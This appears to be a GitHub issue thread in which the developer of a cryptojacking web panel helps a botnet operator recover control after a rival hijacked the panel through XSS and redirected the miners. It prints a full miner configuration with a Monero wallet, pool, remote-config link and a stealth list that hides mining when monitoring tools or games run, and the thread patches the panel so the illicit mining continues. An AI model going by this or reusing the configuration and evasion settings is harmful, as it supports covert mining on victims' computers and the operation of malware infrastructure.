PANEL HACKED!!

[gabjohn3]

Hi unam the webpanel its not secure has been hacked several times i tried adding new htaccess file and not working please help me out how to secure the webpanel

[gabjohn3]

Totally hacked 2 webpanels alredy hacked lol

[UnamSanctam]

You can disable error logging by removing this line: https://github.com/UnamSanctam/UnamWebPanel/blob/b8b30b7b0412fa2f817fb80df9b561291eddb186/UnamWebPanel/assets/php/session-header.php#L8

[UnamSanctam]

No they are probably reading the error log, I always keep all error logs (it's in UNAM_LIB\Logs) clear as a habit (as do most other administrators) so it escaped my mind that some might not (since it might not be obvious).

[UnamSanctam]

Then they should not be able to access it, the login is not done using the database, only by reading the config.php file.

[UnamSanctam]

You can check the code, and the miners will come back on their next restart. Though I am working on the next version of the web panel.

[gabjohn3]

bro that solution was not possible alredy hacked again i delete the line u said and again the hacker gains acces to my panel and redirect my miners to his wallet {"algo":"rx/0","pool":"xmr-eu1.nanopool.org","port":10300,"wallet":"46vT411dNe4JrFXVnLijJBRmzyeNh9gZNH7r4smBT8GChwhb6iu2BAmEDDE31ouCxQEVLezhixbjeFJNcxWgMW646xoMFLq","password":"","nicehash":false,"ssltls":false,"max-cpu":100,"idle-wait":5,"idle-cpu":100,"stealth-targets":"Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe,ModernWarfare.exe,ShooterGame.exe,ShooterGameServer.exe,ShooterGame_BE.exe,GenshinImpact.exe,FactoryGame.exe,Borderlands2.exe,EliteDangerous64.exe,PlanetCoaster.exe,Warframe.x64.exe,NMS.exe,RainbowSix.exe,RainbowSix_BE.exe,CK2game.exe,ck3.exe,stellaris.exe,arma3.exe,arma3_x64.exe,TslGame.exe,ffxiv.exe,ffxiv_dx11.exe,GTA5.exe,FortniteClient-Win64-Shipping.exe,r5apex.exe,VALORANT.exe,csgo.exe,PortalWars-Win64-Shipping.exe,FiveM.exe,left4dead2.exe,FIFA21.exe,BlackOpsColdWar.exe,EscapeFromTarkov.exe,TEKKEN 7.exe,SRTTR.exe,DeadByDaylight-Win64-Shipping.exe,PointBlank.exe,enlisted.exe,WorldOfTanks.exe,SoTGame.exe,FiveM_b2189_GTAProcess.exe,NarakaBladepoint.exe,re8.exe,Sonic Colors - Ultimate.exe,iw6sp64_ship.exe,RocketLeague.exe,Cyberpunk2077.exe,FiveM_GTAProcess.exe,RustClient.exe,Photoshop.exe,VideoEditorPlus.exe,AfterFX.exe,League of Legends.exe,Fallout4.exe,FarCry5.exe,RDR2.exe,Little_Nightmares_II_Enhanced-Win64-Shipping.exe,NBA2K22.exe,Borderlands3.exe,LeagueClientUx.exe,RogueCompany.exe,Tiger-Win64-Shipping.exe,WatchDogsLegion.exe,Phasmophobia.exe,VRChat.exe,NBA2K21.exe,NarakaBladepoint.exe,ForzaHorizon4.exe,acad.exe,AndroidEmulatorEn.exe,bf4.exe,zula.exe,Adobe Premiere Pro.exe,GenshinImpact.exe","kill-targets":"","stealth-fullscreen":true,"remote-config":"https://pastebin.com/raw/y45PvwAd","api-endpoint":"https://owenkruse.click/api/endpoint.php"}

and i cannot enter my panel again it took me off everytime i try to enter please help us ASAP

[UnamSanctam]

and i cannot enter my panel again it took me off everytime i try to enter please help us ASAP

If you cannot enter the web panel then it sounds like the hacker has not gained access to your web panel but your web server, is your web server secure?

[gabjohn3]

its not possible that the hacker hacks AWS they hack the webpanel bro u.u

[gabjohn3]

yes bro

[UnamSanctam]

its not possible that the hacker hacks AWS they hack the webpanel bro u.u we can enter the web panel but it is automatically closing when we login he does not have access to my backend either.

What is he doing? Only changing the configuration? I can only go by what you say.

[gabjohn3]

no, he make a json request /pretending be a miner) and then if we click that we took out of the panel and obviusly he changed the whole config to him

[UnamSanctam]

no, he make a json request /pretending be a miner) and then if we click that we took out of the panel and obviusly he changed the whole config to him he is automatically signing us out the account when we first login and transfering all our miners to his website account

You mean an XSS attack? Can one of you send your database file after it has been hacked?

please add us on discord and we can all figure this out together discord = scar69 its gonna be hard to fix over github issue comments.

I'm banned from Discord for helping people with the miner.

[gabjohn3]

i will send u my db unam give me a sec

[UnamSanctam]

what about telegram?

I've had two Telegram accounts in total but they both stopped working, I don't know if it's even possible to get banned but maybe the numbers I had stopped working, . Since then I haven't used Telegram.

[gabjohn3]

Unam i sent you the db and i check that in the db there's a file htaccess too in the db folder check mail please ASAP ty

[gabjohn3]

He is using email only i send him the db hope we can patch this ASAP to stop that mf

[UnamSanctam]

Alright, looks like it's just a simple XSS attack then here: https://owenkruse.github.io/code.js, it seems like the XSS prevention stopped working in PHP 8 when they changed how a function works (when I had to update compatibility). I'll change two files which should make it work for you.

[gabjohn3]

so what we should do?

[UnamSanctam]

Try using this panel: UnamWebPanel.zip. I currently cannot test it so I wrote it without testing, so please tell me if it works alright.

[UnamSanctam]

I added htmlspecialchars into one line of class/class.ssp.php (the data_output function) and then also into the formatters in assets/php/datatables.php.

[gabjohn3]

BRO I DOWNLOAded but in the db i can see the .htaccess from hacker _:O

[gabjohn3]

Require all denied

<IfModule !mod_authz_core.c> Order Allow,Deny Deny from all Options -Indexes

[UnamSanctam]

No that should be there, it prevents the db from being accessed.

[gabjohn3]

cool, im installing right now

[gabjohn3]

[07-Jan-2024 19:07:38 UTC] PHP Fatal error: Uncaught Error: Call to a member function prepare() on bool in /var/www/html/__UNAM_LIB/unam_lib.php:29 Stack trace:

0 /var/www/html/auth-ajax.php(11): unam_lib->unam_dbSelect()

1 {main}

thrown in /var/www/html/UNAM_LIB/unam_lib.php on line 29 [07-Jan-2024 19:08:25 UTC] PHP Warning: file_put_contents(/var/www/html/UNAM_LIB/Logs/php-error-01-07-2024.html): Failed to open stream: Permission denied in /var/www/html/__UNAM_LIB/unam_lib.php on line 235

which permissions need? cannot save configs cant remember

[UnamSanctam]

755 to the db folder and unamwebpanel.db if your folder/file owners are "correct".

[gabjohn3]

the __UNAM_LIB also need 777 i put 777 to db folder too i think that is insecure

[UnamSanctam]

You don't need that, though it shouldn't really matter.

[gabjohn3]

okay bro, for now i dont get hacked so i will deploy that panel web to the other one hopping this helps

[gabjohn3]

12 minutes and still safe, i think its working

[UnamSanctam]

Great, it was just a simple XSS attack so it's pretty simple to mitigate, and any miners should return to your panel once they restart.

[gabjohn3]

dammn bro i was very worried i have like 14 hours waiting ur response hehehe thanks buddy

[UnamSanctam]

Sure you can message me via email at unams@protonmail.com, though the problem in this case was the XSS attack, unless you have something different.

[UnamSanctam]

And how does it replace the computer name and make the script work? in 1.7.1 it appeared, but no changes are being made

Anything can post data to it as long as it does it using the correct format, there's no way for the web panel to verify that a legitimate miner is contacting it. The text in the field was being run due to an XSS exploit.

[gabjohn3]

omg, that MF Still trying to hack the panels unam look

[UnamSanctam]

Yes but it's fine, it won't do anything now. He might have a script running that contacts your web panel automatically.

[gabjohn3]

Please don't delete the updatewebpanel so everybody can update their webpanels to the new version HAHA he is loosing hashrate :D

[UnamSanctam]

we have already been hacked again dude..

Send your database here or to unams@protonmail.com, I might've missed some escape in the formatting since I'm not able to test it at the moment.

[UnamSanctam]

Here's a new version that sanitizes every input: UnamWebPanel.zip, please test it and see if everything works. I had to code it on my phone so I'm not able to test it at the moment but @gabjohn3 did test it and it seems to work.

[gabjohn3]

yes Its working i dont see any try for hacking so im monitoring every single file in the logs or error logs or php files :D